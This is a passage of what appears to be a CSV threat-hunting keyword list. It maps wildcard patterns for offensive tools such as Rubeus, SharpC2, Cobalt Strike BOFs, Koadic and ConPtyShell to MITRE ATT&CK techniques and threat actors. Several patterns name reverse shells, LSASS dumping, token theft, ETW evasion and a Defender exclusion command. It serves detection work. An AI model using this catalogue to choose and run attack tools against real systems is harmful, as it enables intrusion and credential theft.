internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*-Command Add-MpPreference -ExclusionProcess *\Program Files\FreeFileSync\Bin\*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*command_obfuscator.py*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*command=*###---POWERSHELL---*eval $(echo *,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*CommandAndControl_*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*CommandCam.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*commandovm.*.installer.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*commando-vm-master*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z 
-*Commands/Brute.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/Createnetonly.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/DcomCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/DroneCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ExecuteAssembly.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/KillProcess.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ListProcesses.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Logonsession.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/PowerShellImport.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Preauthscan.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/PrintWorkingDirectory.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/PsExecCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/RevToSelf.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/RunPe.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/SetSleep.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Shell.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - 
TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ShInject.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/ShSpawn.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/Silver.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Commands/StealToken.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/StopDrone.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/TakeScreenshot.*,offensive_tool_keyword,SharpC2,Command and Control 
Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WhoAmI.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WinRmCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Commands/WmiCommand.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*commixproject/commix*,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*common.ReflectiveDLL*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*common.ReflectiveDLL*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*common_passwords.txt*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*commonspeak_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*communicate_as_backdoor_user.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*comnap_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*comnode_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*compile_implant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*completedns-get-ns-history*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*COMPlus_ETWEnabled=0\0\0\0*,offensive_tool_keyword,ETW,stop 
ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*compress_encode_obfs*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*computers_pwdnotreqd*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*comsvcs_lsass*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ComsvcsLSASS*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*config/51pwn/CVE-*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*Confuser.CLI.Exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*Confuser.CLI.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Confuser.DynCipher.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Confuser.Renamer.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Connect-AzureAD -AadAccessToken -AccountId *,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Connection refused: tcp_wrappers denial.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Connection refused: too many sessions for this address.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*connormcgarr/tgtdelegation*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*conptyshell *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*ConPtyShell.cs*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell.zip*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation 